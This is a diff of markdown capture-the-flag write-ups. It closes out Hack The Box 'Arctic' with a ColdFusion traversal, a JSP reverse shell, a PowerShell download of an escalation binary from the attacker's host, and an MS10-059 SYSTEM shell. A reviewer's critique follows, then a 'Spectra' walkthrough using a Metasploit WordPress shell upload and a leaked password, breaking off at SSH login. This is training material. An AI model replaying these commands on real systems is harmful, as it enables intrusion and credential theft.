+ < Connection: close
+ **< Server: JRun Web Server**
+ <
+
+ [Webpage Sourcecode [...]]
+
+
+Now we know that 10.10.10.11 is running JRun Web Server at the port 8500. let's open it using our web browser to see what we can do there.
+
+  
+
+By opening up the aforementioned URL in our web browser, we navigate to a ColdFusion8 login page through the directories **cfide/administrator**. By doing a quick searchsploit command using the keyword Coldfusion, we see that the service may be vulnerable to Directory Traversal Attacks.
+
+
+ **λ nihilist [ 127.0.0.1 ] [~] → searchsploit ColdFusion 8**
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ **Adobe ColdFusion - Directory Traversal (Metasploit) | exploits/multiple/remote/16985.rb**
+ Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt
+ Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cr | exploits/cfm/webapps/33170.txt
+ Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.c | exploits/cfm/webapps/33167.txt
+ Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query | exploits/cfm/webapps/33169.txt
+ Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?sta | exploits/cfm/webapps/33168.txt
+ Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remo | exploits/windows/remote/43993.py
+ ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | exploits/cfm/webapps/16788.rb
+ ColdFusion MX - Missing Template Cross-Site Scripting | exploits/cfm/remote/21548.txt
+ Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | exploits/multiple/remote/22867.pl
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+By navigating to the exploit n°16985 on exploitdb, we see that we should be able to try a certain URL exploiting Coldfusion's assumed Directory Traversal Vulnerability. The URL to be tried is the following :
+
+
+ http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en
+
+
+You can see that this is indeed a Directory Traversal Vulnerability, because it is using the **../** special characters to change directory, going up the directory tree, in order to reach the root **/** directory. The difference with Local File Inclusion vulnerabilities, is that you have to use **../** to go up the directory tree. with LFI you could start with the root folder / and go down from there e.g : **/etc/passwd** The URL ends with a null byte ( **%00**) in order to end the string. For example: myCoolScript.php%00.txt - Meets .txt, but is going to execute .php for that matter, the "en" is there to meet the script's requirement but it ends right before that thanks to the null byte.
+
+
+
+Although the RFI (Remote File Inclusion) Vulnerability would allow us much more flexibility in terms of exploiting vulnerable targets, they remain very rare, because it is very easy to make sure that there is no http in the include page.
+
+(Special Thanks to Reelix for the technical details.)
+
+
+
+The Directory Traversal Vulnerability was successful, now we have a Hash to work with. We will be using the hash-identifier command to identify the hash's encryption algorithm.
+
+
+ λ nihilist [ 127.0.0.1 ] [~] → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: **2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03**
+
+ Possible Hashs:
+ **[+] SHA-1**
+ [+] MySQL5 - SHA-1(SHA-1($pass))
+
+
+Paste the Hash into your favorite web-browser along with the SHA-1 keyword, and you should easily find the original "happyday" password.
+
+
+
+We will now log into the ColdFusion8 Login form using our freshly-acquired credentials **admin:happyday**
+
+
+
+Once on the coldfusion Dashboard, logged in as admin, we will upload a reverse shell tcp that we will generate using the msfvenom command, naming it as shell.jsp. The Scheduled task will download the shell.jsp payload , so we will need python to run the http server for us within a second terminal. We will upload it as a scheduled task, browse to it within our web browser, and catch the incoming reverse shell connection using the netcat command.
+
+_Terminal n°1:_
+
+
+ **λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Arctic] → msfvenom -p java/jsp_shell_reverse_tcp \
+ > LHOST=10.10.14.48 \
+ > LPORT=443 \
+ > -f raw > shell.jsp**
+ Payload size: 1496 bytes
+
+ **λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Arctic] → su**
+ Password:
+
+ **λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Arctic] → nc -lvnp 443**
+
+
+ _Terminal n°2:_
+
+
+ **λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Arctic] → python -m http.server 8000**
+ Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
+ 10.10.10.11 - - [11/Nov/2019 13:57:02] "GET /shell.jsp HTTP/1.1" 200 -
+
+
+The box successfully downloaded our shell.jsp ! now we will browse to it , and observe our first terminal receieve the shell connection.
+
+ _Terminal n°1:_
+
+
+ **λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Arctic] → nc -lvnp 443**
+ ls
+ Connection from 10.10.10.11:54438
+ Microsoft Windows [Version 6.1.7600]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ **C:\ColdFusion8\runtime\bin>whoami**
+ whoami
+ arctic\tolis
+
+
+We now have a reverse shell, logged as the user tolis, we can now print out the user flag.
+
+
+ **C:\ColdFusion8\runtime\bin>more C:\Users\tolis\Desktop\user.txt**
+
+ more C:\Users\tolis\Desktop\user.txt
+ 02XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Part 3 : Getting Root Access**
+
+Now we need to escalate privileges onto the box. For that matter we can use a binary named "chimichurri.exe" which takes advantage of the vulnerability MS10-059 available on this machine, we can verify it by typing in the **systeminfo** command
+
+
+ **C:\ColdFusion8\runtime\bin>systeminfo**
+ systeminfo
+
+ Host Name: ARCTIC
+ **OS Name: Microsoft Windows Server 2008 R2 Standard**
+ OS Version: 6.1.7600 N/A Build 7600
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Server
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 55041-507-9857321-84451
+ Original Install Date: 22/3/2017, 11:09:45 ��
+ System Boot Time: 12/11/2019, 1:11:38 ��
+ System Manufacturer: VMware, Inc.
+ System Model: VMware Virtual Platform
+ System Type: x64-based PC
+ Processor(s): 2 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: el;Greek
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
+ Total Physical Memory: 1.023 MB
+ Available Physical Memory: 370 MB
+ Virtual Memory: Max Size: 2.047 MB
+ Virtual Memory: Available: 1.281 MB
+ Virtual Memory: In Use: 766 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: HTB
+ Logon Server: N/A
+ **Hotfix(s): N/A**
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) PRO/1000 MT Network Connection
+ Connection Name: Local Area Connection
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.11
+
+
+We see that this machine is vulnerable to the aforementionned binary exploit, because : -it is running Microsoft Windows Server 2008 R2 -There are no Hotfixes installed on the machine.
+
+The lack of Hotfixes indicates a serious lack of security, which would allow an attacker (us) to escalate priveleges on the machine.
+
+As it is detailed in this [bulletin report](https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-059), the hotfix KB982799 is required to fix the MS10-059 vulnerability
+
+To be able to get chimmichurri.exe on this machine, we will need to write a ps1 script that will download the binary on our machine, serving a simple http server with python. to be able to execute our privesc binary we first need to check if we can write .ps1 files on the machine.
+
+
+ **C:\ColdFusion8\runtime\bin>echo test >> xd.ps1**
+ echo test >> xd.ps1
+
+ C:\ColdFusion8\runtime\bin>more xd.ps1
+ more xd.ps1
+ test
+
+
+We have been able to put the line "test" into our ps1 file named xd.
+
+Now we will make a file named wget.ps1 that will contain the lines required to download chimmichurri.exe from 10.10.14.48 (our local machine).
+
+_Terminal 1:_
+
+
+ **C:\ColdFusion8\runtime\bin>echo $webclient = New-Object System.Net.WebClient >> wget.ps1**
+ echo $webclient = New-Object System.Net.WebClient >> wget.ps1
+
+ **C:\ColdFusion8\runtime\bin>dir**
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is F88F-4EA5
+
+ Directory of C:\ColdFusion8\runtime\bin
+
+ 12/11/2019 11:22 �� **IR> .
+ 12/11/2019 11:22 �� **IR> ..
+ 18/03/2008 11:11 �� 64.512 java2wsdl.exe
+ 19/01/2008 09:59 �� 2.629.632 jikes.exe
+ 18/03/2008 11:11 �� 64.512 jrun.exe
+ 18/03/2008 11:11 �� 71.680 jrunsvc.exe
+ 18/03/2008 11:11 �� 5.120 jrunsvcmsg.dll
+ 18/03/2008 11:11 �� 64.512 jspc.exe
+ 22/03/2017 08:53 �� 1.804 jvm.config
+ 18/03/2008 11:11 �� 64.512 migrate.exe
+ 18/03/2008 11:11 �� 34.816 portscan.dll
+ 18/03/2008 11:11 �� 64.512 sniffer.exe
+ 12/11/2019 11:22 �� 47 wget.ps1
+ 18/03/2008 11:11 �� 78.848 WindowsLogin.dll
+ 18/03/2008 11:11 �� 64.512 wsconfig.exe
+ 22/03/2017 08:53 �� 1.013 wsconfig_jvm.config
+ 18/03/2008 11:11 �� 64.512 wsdl2java.exe
+ 12/11/2019 11:18 �� 7 xd.ps1
+ 18/03/2008 11:11 �� 64.512 xmlscript.exe
+ 17 File(s) 3.339.063 bytes
+ 2 Dir(s) 33.189.847.040 bytes free
+
+ **C:\ColdFusion8\runtime\bin>more wget.ps1**
+ more wget.ps1
+ $webclient = New-Object System.Net.WebClient
+
+ **C:\ColdFusion8\runtime\bin>echo $url = "http://10.10.14.48:8000/ChimiChurri.exe" >> wget.ps1**
+ echo $url = "http://10.10.14.48:8000/ChimiChurri.exe" >> wget.ps1
+
+ **C:\ColdFusion8\runtime\bin>more wget.ps1**
+ more wget.ps1
+ $webclient = New-Object System.Net.WebClient
+ $url = "http://10.10.14.48:8000/ChimiChurri.exe"
+
+ **C:\ColdFusion8\runtime\bin>echo $file = "exploit.exe" >> wget.ps1**
+ echo $file = "exploit.exe" >> wget.ps1
+
+ **C:\ColdFusion8\runtime\bin>echo $webclient.DownloadFile($url,$file) >> wget.ps1**
+ echo $webclient.DownloadFile($url,$file) >> wget.ps1
+
+
+
+ **C:\ColdFusion8\runtime\bin>more wget.ps1**
+ more wget.ps1
+ $webclient = New-Object System.Net.WebClient
+ $url = "http://10.10.14.48:8000/ChimiChurri.exe"
+ $file = "exploit.exe"
+ $webclient.DownloadFile($url,$file)
+
+
+
+ **C:\ColdFusion8\runtime\bin>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1**
+ powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
+ ^CExiting.
+
+ **λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Arctic] → nc -lvnp 443**
+ Connection from 10.10.10.11:54538
+ Microsoft Windows [Version 6.1.7600]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ **C:\ColdFusion8\runtime\bin>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1**
+ powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
+
+
+
+_Terminal 2:_
+
+
+ **λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Arctic] → python -m http.server 8000**
+ Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
+ 10.10.10.11 - - [11/Nov/2019 14:25:32] "GET /shell.jsp HTTP/1.1" 200 -
+ 10.10.10.11 - - [11/Nov/2019 14:26:37] "GET /ChimiChurri.exe HTTP/1.1" 200 -
+
+
+The download has been successful ! Now all that we need to do is launch exploit.exe and recieve the elevated privilege reverse shell to our third terminal with the netcat command.
+
+_Terminal 1:_
+
+
+ **C:\ColdFusion8\runtime\bin>exploit.exe 10.10.14.48 9001**
+ exploit.exe 10.10.14.48 9001
+ /Chimichurri/-->This exploit gives you a Local System shell
+ /Chimichurri/-->Changing registry values...
+ /Chimichurri/-->Got SYSTEM token...
+ /Chimichurri/-->Running reverse shell...
+ /Chimichurri/-->Restoring default registry values...
+
+
+
+_Terminal 3:_
+
+
+ **λ nihilist [ 10.10.14.48/23 ] [~] → nc -lvnp 9001**
+ whoami
+ Connection from 10.10.10.11:54563
+ Microsoft Windows [Version 6.1.7600]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ **C:\ColdFusion8\runtime\bin>whoami**
+ nt authority\system
+
+ **C:\ColdFusion8\runtime\bin>more C:\Users\Administrator\Desktop\root.txt**
+ more C:\Users\Administrator\Desktop\root.txt
+ ceXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
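Review bot: the null-byte explanation under the `enter.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en` URL is inaccurate: `%00` works because the file is opened with the path that precedes the NUL, so the trailing `en` is never part of the filename; the `myCoolScript.php%00.txt` example describes an extension-check bypass on upload, which is a different bug, and the sentence "The difference with Local File Inclusion vulnerabilities, is that you have to use ../" should go, since this is a traversal used to read a local file, i.e. the same class of bug. The password.properties contents and the ColdFusion login page exist only as image references that did not make it into the diff, so the hash `2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03` appears out of nowhere; quote the line of the file it came from. "identify the hash's encryption algorithm" should read "hash algorithm", a hash is not encryption. The scheduled-task step never says where the task wrote shell.jsp on the target or which URL was requested to trigger it; add the output path and the request. Around the two `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1` prompts, `^CExiting.` followed by `Connection from 10.10.10.11:54538` and the second `GET /shell.jsp` at 14:25:32 show that Ctrl+C killed the first listener and the JSP shell was re-triggered; say so, otherwise the duplicated prompt reads like a paste error. One caveat worth adding: `$file = "exploit.exe"` is a relative path and `WebClient.DownloadFile` resolves it against the process working directory, which only lands in `C:\ColdFusion8\runtime\bin` because powershell.exe was started from that cmd prompt. Smaller items: the nmap prompt reads `[~/_HTB/Beep]` (leftover from another writeup), the `systeminfo` and `dir` output carries mojibake (`��`) where the Greek-locale AM/PM marker was, "because : -it is running ... -There are no Hotfixes" should be a proper list, and "chimmichurri"/"ChimiChurri"/"chimichurri", "priveleges", "recieve", "receieve" and "aforementionned" each need one consistent spelling.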
diff --git a/Easy/60.md b/Easy/60.md
new file mode 100644
index 0000000..13415d9
--- /dev/null
+++ b/Easy/60.md
@@ -0,0 +1,527 @@
+# Spectra Writeup
+
+
+
+## Introduction :
+
+Spectra is an easy box released back in Febuary 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → nmap -vvv -p- 10.129.186.23 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.129.186.23
+ Discovered open port 3306/tcp on 10.129.186.23
+ Discovered open port 80/tcp on 10.129.186.23
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → nmap -sCV -p 22,80,3306 10.129.186.23
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-09 13:20 CEST
+ Nmap scan report for 10.129.186.23
+ Host is up (0.45s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
+ | ssh-hostkey:
+ |_ 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
+ 80/tcp open http nginx 1.17.4
+ |_http-server-header: nginx/1.17.4
+ |_http-title: Site doesn't have a title (text/html).
+ 3306/tcp open mysql MySQL (unauthorized)
+ |_ssl-cert: ERROR: Script execution failed (use -d to debug)
+ |_ssl-date: ERROR: Script execution failed (use -d to debug)
+ |_sslv2: ERROR: Script execution failed (use -d to debug)
+ |_tls-alpn: ERROR: Script execution failed (use -d to debug)
+ |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 50.62 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+We press **CTRL+U** to view the page sourcecode:
+
+
+
+Which reveals us the **spectra.htb** hostname, so we add it to our hostfile:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.129.186.23 spectra.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping -c1 spectra.htb
+ PING spectra.htb (10.129.186.23) 56(84) bytes of data.
+ 64 bytes from spectra.htb (10.129.186.23): icmp_seq=1 ttl=63 time=449 ms
+
+ --- spectra.htb ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 449.174/449.174/449.174/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+
+
+Once that's done, we can visit first visit **http://spectra.htb/main/index.php** :
+
+
+
+So here we have a wordpress site, the other link gives a database connection error:
+
+
+
+The error doesn't give us any info, therefore we move on to scanning the wordpress website:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → wpscan --url http://spectra.htb/main/
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.8.18
+
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [i] Updating the Database ...
+ [i] Update completed.
+
+ [+] URL: http://spectra.htb/main/ [10.129.186.23]
+ [+] Started: Mon Aug 9 13:48:33 2021
+
+ Interesting Finding(s):
+
+ [+] Headers
+ | Interesting Entries:
+ | - Server: nginx/1.17.4
+ | - X-Powered-By: PHP/5.6.40
+ | Found By: Headers (Passive Detection)
+ | Confidence: 100%
+
+ [+] XML-RPC seems to be enabled: http://spectra.htb/main/xmlrpc.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+ | References:
+ | - http://codex.wordpress.org/XML-RPC_Pingback_API
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
+ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
+
+ [+] WordPress readme found: http://spectra.htb/main/readme.html
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+
+ [+] The external WP-Cron seems to be enabled: http://spectra.htb/main/wp-cron.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 60%
+ | References:
+ | - https://www.iplocation.net/defend-wordpress-from-ddos
+ | - https://github.com/wpscanteam/wpscan/issues/1299
+
+ [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
+ | Found By: Rss Generator (Passive Detection)
+ | - http://spectra.htb/main/?feed=rss2, generator>https://wordpress.org/?v=5.4.2 generator>
+ | - http://spectra.htb/main/?feed=comments-rss2, generator>https://wordpress.org/?v=5.4.2 generator>
+
+ [+] WordPress theme in use: twentytwenty
+ | Location: http://spectra.htb/main/wp-content/themes/twentytwenty/
+ | Last Updated: 2021-07-22T00:00:00.000Z
+ | Readme: http://spectra.htb/main/wp-content/themes/twentytwenty/readme.txt
+ | [!] The version is out of date, the latest version is 1.8
+ | Style URL: http://spectra.htb/main/wp-content/themes/twentytwenty/style.css?ver=1.2
+ | Style Name: Twenty Twenty
+ | Style URI: https://wordpress.org/themes/twentytwenty/
+ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
+ | Author: the WordPress team
+ | Author URI: https://wordpress.org/
+ |
+ | Found By: Css Style In Homepage (Passive Detection)
+ |
+ | Version: 1.2 (80% confidence)
+ | Found By: Style (Passive Detection)
+ | - http://spectra.htb/main/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2'
+
+ [+] Enumerating All Plugins (via Passive Methods)
+
+ [i] No plugins Found.
+
+ [+] Enumerating Config Backups (via Passive and Aggressive Methods)
+ Checking Config Backups - Time: 00:00:15
+ [i] No Config Backups Found.
+
+ [!] No WPScan API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
+
+ [+] Finished: Mon Aug 9 13:49:12 2021
+ [+] Requests Done: 186
+ [+] Cached Requests: 5
+ [+] Data Sent: 46.09 KB
+ [+] Data Received: 17.279 MB
+ [+] Memory used: 220.246 MB
+ [+] Elapsed time: 00:00:38
+
+
+
+Nothing too interesting in here, the intended path was to dirbust the /testing/ directory or just browsing it since it has nginx's autoindexing enabled:
+
+
+
+The interesting file here is **wp-config.php.save** :
+
+
+
+Now here it looks like we have credentials to use. But where ? Let's first try **/main/wp-admin/** the default admin username being **administrator** :
+
+ 
+
+And we are logged in as the administrator user! First thing we can do here is get a reverse shell by injecting the appearance php code of the wordpress website with a reverse shell:
+
+
+
+However the website is way too unresponsive for us to be able to do that, so instead we're going to use metasploit:
+
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/23 ] [~/HTB/Spectra]
+ → msfconsole
+ ..-
+ ######## #
+ ################# #
+ ###################### #
+ ######################### #
+ ############################
+ ##############################
+ ###############################
+ ###############################
+ ##############################
+ # ######## #
+ ## ### #### ##
+ ### ###
+ #### ###
+ #### ########## ####
+ ####################### ####
+ #################### ####
+ ################## ####
+ ############ ##
+ ######## ###
+ ######### #####
+ ############ ######
+ ######## #########
+ ##### ########
+ ### #########
+ ###### ############
+ #######################
+ # # ### # # ##
+ ########################
+ ## ## ## ##
+ https://metasploit.com
+
+
+ =[ metasploit v6.0.53-dev ]
+ + -- --=[ 2149 exploits - 1143 auxiliary - 366 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 8 evasion ]
+
+ Metasploit tip: Start commands with a space to avoid saving
+ them to history
+
+ msf6 > use unix/webapp/wp_admin_shell_upload
+ [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
+
+ Module options (exploit/unix/webapp/wp_admin_shell_upload):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PASSWORD yes The WordPress password to authenticate with
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes The base path to the wordpress application
+ USERNAME yes The WordPress username to authenticate with
+ VHOST no HTTP server virtual host
+
+
+ Payload options (php/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST 10.66.66.2 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 WordPress
+
+
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.129.186.23
+ RHOSTS => 10.129.186.23
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/
+ TARGETURI => /main/
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME administrator
+ USERNAME => administrator
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD devteam01
+ PASSWORD => devteam01
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST spectra.htb
+ VHOST => spectra.htb
+
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST tun0
+ LHOST => tun0
+
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
+
+
+
+
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.34:4444
+ [*] Authenticating with WordPress using administrator:devteam01...
+ [+] Authenticated with WordPress
+ [*] Preparing payload...
+ [*] Uploading payload...
+ [*] Executing the payload at /main/wp-content/plugins/UtPzwuowWY/DRoQRuMWzs.php...
+ [*] Sending stage (39282 bytes) to 10.129.186.23
+ [+] Deleted DRoQRuMWzs.php
+ [+] Deleted UtPzwuowWY.php
+ [+] Deleted ../UtPzwuowWY
+ [*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.129.186.23:40514) at 2021-08-09 15:07:29 +0200
+
+ meterpreter > shell
+ Process 11921 created.
+ Channel 0 created.
+ sh: 0: getcwd() failed: No such file or directory
+ sh: 0: getcwd() failed: No such file or directory
+ id
+ uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)
+
+ echo $0
+ bash
+
+
+So here we managed to get a bash shell onto the box, however it is very limited, so we upgrade it like so:
+
+
+ export PATH
+ export PATH
+ export TERM=xterm
+ export TERM=xterm
+ which python3
+ which python3
+ /usr/local/bin/python3
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ nginx@spectra / $ cd ~
+ cd ~
+ nginx@spectra ~ $ ls -lash
+ ls -lash
+ total 32K
+ 4.0K drwxr-xr-x 5 nginx nginx 4.0K Feb 4 2021 .
+ 4.0K drwxr-xr-x 8 root root 4.0K Feb 2 2021 ..
+ 0 lrwxrwxrwx 1 root root 9 Feb 4 2021 .bash_history -> /dev/null
+ 4.0K -rw-r--r-- 1 nginx nginx 127 Dec 22 2020 .bash_logout
+ 4.0K -rw-r--r-- 1 nginx nginx 204 Dec 22 2020 .bash_profile
+ 4.0K -rw-r--r-- 1 nginx nginx 551 Dec 22 2020 .bashrc
+ 4.0K drwx------ 3 nginx nginx 4.0K Jan 15 2021 .pki
+ 4.0K drwx------ 2 nginx nginx 4.0K Jan 15 2021 .ssh
+ 4.0K drwxr-xr-x 2 nginx nginx 4.0K Jan 15 2021 log
+
+
+
+Now from here we need to take a look at which user has the user flag:
+
+
+ nginx@spectra ~ $ ls -lash /home
+ ls -lash /home
+ total 32K
+ 4.0K drwxr-xr-x 8 root root 4.0K Feb 2 2021 .
+ 4.0K drwxr-xr-x 22 root root 4.0K Feb 2 2021 ..
+ 4.0K drwx------ 4 root root 4.0K Jul 20 2020 .shadow
+ 4.0K drwxr-xr-x 20 chronos chronos 4.0K Aug 9 04:15 chronos
+ 4.0K drwxr-xr-x 5 katie katie 4.0K Feb 2 2021 katie
+ 4.0K drwxr-xr-x 5 nginx nginx 4.0K Feb 4 2021 nginx
+ 4.0K drwxr-x--t 4 root root 4.0K Jul 20 2020 root
+ 4.0K drwxr-xr-x 4 root root 4.0K Jul 20 2020 user
+ nginx@spectra ~ $ ls -lash /home/katie
+ ls -lash /home/katie
+ total 36K
+ 4.0K drwxr-xr-x 5 katie katie 4.0K Feb 2 2021 .
+ 4.0K drwxr-xr-x 8 root root 4.0K Feb 2 2021 ..
+ 0 lrwxrwxrwx 1 root root 9 Feb 2 2021 .bash_history -> /dev/null
+ 4.0K -rw-r--r-- 1 katie katie 127 Dec 22 2020 .bash_logout
+ 4.0K -rw-r--r-- 1 katie katie 204 Dec 22 2020 .bash_profile
+ 4.0K -rw-r--r-- 1 katie katie 551 Dec 22 2020 .bashrc
+ 4.0K drwx------ 3 katie katie 4.0K Jan 15 2021 .pki
+ 4.0K drwx------ 2 katie katie 4.0K Feb 10 06:10 .ssh
+ 4.0K drwxr-xr-x 2 katie katie 4.0K Jan 15 2021 log
+ 4.0K -r-------- 1 katie katie 33 Feb 2 2021 user.txt
+ nginx@spectra ~ $ cat /home/katie/user.txt
+ cat /home/katie/user.txt
+ cat: /home/katie/user.txt: Permission denied
+
+
+Now if we take a look at **/etc/autologin/passwd** we see a cleartext password:
+
+
+ nginx@spectra ~ $ cat /etc/autologin/passwd
+ cat /etc/autologin/passwd
+ SummerHereWeCome!!
+
+
+
+So let's try to use it to login as the katie user:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/25 ] [~/HTB/Spectra]
+ → ssh katie@spectra.htb
+ The authenticity of host 'spectra.htb (10.129.186.23)' can't be established.
+ RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
